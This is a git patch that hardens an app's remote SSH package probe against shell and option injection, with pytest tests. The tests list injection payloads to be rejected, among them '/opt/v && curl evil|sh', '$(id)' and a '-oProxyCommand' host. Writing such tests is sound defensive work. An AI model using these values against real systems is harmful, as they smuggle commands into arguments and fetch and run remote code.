From 743c074b2ed547fa13e391232d24ea7b90bf8f6c Mon Sep 17 00:00:00 2001 From: pewdiepie-archdaemon Date: Mon, 1 Jun 2026 22:44:34 +0900 Subject: [PATCH] Harden Cookbook package SSH probe --- routes/shell_routes.py | 72 ++++++++++++++++++++++++----------- tests/test_shell_routes.py | 78 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 128 insertions(+), 22 deletions(-) diff --git a/routes/shell_routes.py b/routes/shell_routes.py index 583220c..c791b12 100644 --- a/routes/shell_routes.py +++ b/routes/shell_routes.py @@ -4,6 +4,7 @@ import asyncio import json import logging import os +import re import shlex import shutil import subprocess @@ -57,6 +58,40 @@ def _require_admin(request: Request): if not auth_manager.is_admin(user): raise HTTPException(403, "Admin only") + +def _reject_cross_site(request: Request): + """Reject browser cross-site navigations to shell-touching endpoints.""" + if request.headers.get("sec-fetch-site") == "cross-site": + raise HTTPException(403, "Cross-site request rejected") + + +_SSH_PORT_RE = re.compile(r"^\d{1,5}$") +_SAFE_VENV_RE = re.compile(r"^[A-Za-z0-9_./~-]+$") + + +def _ssh_base_argv(host: str, ssh_port: str | None) -> list[str]: + """Build an ssh argv prefix for remote probes without local-shell parsing.""" + if not host or not str(host).strip() or str(host).lstrip().startswith("-"): + raise ValueError("invalid ssh host") + argv = ["ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no"] + if ssh_port and str(ssh_port).strip() not in ("", "22"): + port = str(ssh_port).strip() + if not _SSH_PORT_RE.match(port) or not (1 <= int(port) <= 65535): + raise ValueError("invalid ssh port") + argv += ["-p", port] + argv.append(str(host).strip()) + return argv + + +def _venv_activate_prefix(venv: str | None) -> str: + """Return a remote activation prefix while preserving shell expansion of ~.""" + if not venv: + return "" + if not _SAFE_VENV_RE.match(venv): + raise ValueError("invalid venv path") + act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate" + return f". {act} && " + logger = logging.getLogger(__name__) PTY_SUPPORTED = pty is not None and fcntl is not None and hasattr(os, "setsid") @@ -755,13 +790,12 @@ def setup_shell_routes() -> APIRouter: never reflected because the check only ever looked at the local host. """ _require_admin(request) + _reject_cross_site(request) import importlib, importlib.metadata as importlib_metadata, shlex, json as _json - port_arg = "" if ssh_port and str(ssh_port).strip() not in ("", "22"): _port = str(ssh_port).strip() - if not _port.isdigit(): + if not _SSH_PORT_RE.match(_port) or not (1 <= int(_port) <= 65535): raise HTTPException(400, "Invalid ssh_port") - port_arg = f"-p {int(_port)} " packages = [ # ── System ── OS binaries, not pip packages {"name": "tmux", "pip": "", "desc": "Required for Linux/Termux Cookbook background downloads and serves", "category": "System", "target": "remote", "kind": "system", "install_hint": "Run Cookbook server setup, or install tmux with apt/pacman/dnf/apk/zypper."}, @@ -787,20 +821,13 @@ def setup_shell_routes() -> APIRouter: if host and remote_names: try: py = _package_probe_script(remote_names) - src = "" - if venv: - act = venv if venv.endswith("/bin/activate") else venv.rstrip("/") + "/bin/activate" - # NOT shlex.quoted: a leading ~ must stay shell-expandable on - # the remote (quoting it breaks `~/venv` → activation fails → - # the && short-circuits and every package reads as missing). - src = f". {act} && " + # `venv` is validated but left unquoted so leading ~ expands on + # the remote; quoting it breaks ~/venv activation. + src = _venv_activate_prefix(venv) inner = f"{src}python3 -c {shlex.quote(py)}" - ssh_cmd = ( - f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}" - f"{shlex.quote(host)} {shlex.quote(inner)}" - ) - proc = await asyncio.create_subprocess_shell( - ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE + argv = _ssh_base_argv(host, ssh_port) + [inner] + proc = await asyncio.create_subprocess_exec( + *argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE ) out, _err = await asyncio.wait_for(proc.communicate(), timeout=12) txt = out.decode("utf-8", errors="replace").strip() @@ -815,6 +842,8 @@ def setup_shell_routes() -> APIRouter: if isinstance(probe, dict) } break + except ValueError as e: + raise HTTPException(400, str(e)) except Exception: remote_status = {} if host and remote_system_names: @@ -824,12 +853,9 @@ def setup_shell_routes() -> APIRouter: qn = shlex.quote(name) checks.append(f"if command -v {qn} >/dev/null 2>&1; then echo {qn}=1; else echo {qn}=0; fi") inner = " ; ".join(checks) - ssh_cmd = ( - f"ssh -o ConnectTimeout=6 -o StrictHostKeyChecking=no {port_arg}" - f"{shlex.quote(host)} {shlex.quote(inner)}" - ) - proc = await asyncio.create_subprocess_shell( - ssh_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE + argv = _ssh_base_argv(host, ssh_port) + [inner] + proc = await asyncio.create_subprocess_exec( + *argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE ) out, _err = await asyncio.wait_for(proc.communicate(), timeout=12) txt = out.decode("utf-8", errors="replace").strip() @@ -837,6 +863,8 @@ def setup_shell_routes() -> APIRouter: name, sep, value = line.strip().partition("=") if sep and name in remote_system_names: remote_status[name] = value == "1" + except ValueError as e: + raise HTTPException(400, str(e)) except Exception: pass diff --git a/tests/test_shell_routes.py b/tests/test_shell_routes.py index ef407bb..31142df 100644 --- a/tests/test_shell_routes.py +++ b/tests/test_shell_routes.py @@ -7,12 +7,17 @@ import sys from pathlib import Path from types import SimpleNamespace +import pytest + from routes.shell_routes import ( _find_line_break, _running_in_container, _docker_row_status, _package_installed_from_probe, _package_status_note, + _reject_cross_site, + _ssh_base_argv, + _venv_activate_prefix, DOCKER_IN_CONTAINER_HINT, ) @@ -241,3 +246,76 @@ class TestPackageProbeStatus: assert _package_installed_from_probe("diffusers", missing_torch) is False assert _package_installed_from_probe("diffusers", ready) is True + + +class TestSshBaseArgv: + def test_basic_host_no_port(self): + assert _ssh_base_argv("user@example.com", None) == [ + "ssh", "-o", "ConnectTimeout=6", "-o", "StrictHostKeyChecking=no", + "user@example.com", + ] + + def test_default_port_22_omitted(self): + assert "-p" not in _ssh_base_argv("h", "22") + assert "-p" not in _ssh_base_argv("h", "") + assert "-p" not in _ssh_base_argv("h", None) + + def test_custom_port_added_as_separate_argv(self): + assert _ssh_base_argv("h", "2222")[-3:] == ["-p", "2222", "h"] + + @pytest.mark.parametrize("bad", ["0", "70000", "-1", "8a", "$(id)", "22 22"]) + def test_bad_port_rejected(self, bad): + with pytest.raises(ValueError): + _ssh_base_argv("h", bad) + + def test_option_injecting_host_rejected(self): + with pytest.raises(ValueError): + _ssh_base_argv("-oProxyCommand=touch /tmp/pwn", None) + + @pytest.mark.parametrize("bad", ["", " ", None]) + def test_empty_host_rejected(self, bad): + with pytest.raises(ValueError): + _ssh_base_argv(bad, None) + + +class TestVenvActivatePrefix: + def test_empty_returns_blank(self): + assert _venv_activate_prefix(None) == "" + assert _venv_activate_prefix("") == "" + + def test_appends_bin_activate(self): + assert _venv_activate_prefix("~/venv") == ". ~/venv/bin/activate && " + + def test_already_pointing_at_activate(self): + assert _venv_activate_prefix("/opt/v/bin/activate") == ". /opt/v/bin/activate && " + + @pytest.mark.parametrize("bad", [ + "/opt/v && curl evil|sh", + "$(id)", + "`id`", + "v;id", + "v\nid", + "v|id", + ]) + def test_injection_payloads_rejected(self, bad): + with pytest.raises(ValueError): + _venv_activate_prefix(bad) + + +class TestRejectCrossSite: + @staticmethod + def _req(headers): + return SimpleNamespace(headers=headers) + + def test_cross_site_rejected(self): + from fastapi import HTTPException + with pytest.raises(HTTPException) as exc: + _reject_cross_site(self._req({"sec-fetch-site": "cross-site"})) + assert exc.value.status_code == 403 + + @pytest.mark.parametrize("site", ["same-origin", "same-site", "none"]) + def test_same_origin_and_direct_nav_allowed(self, site): + assert _reject_cross_site(self._req({"sec-fetch-site": site})) is None + + def test_missing_header_allowed(self): + assert _reject_cross_site(self._req({})) is None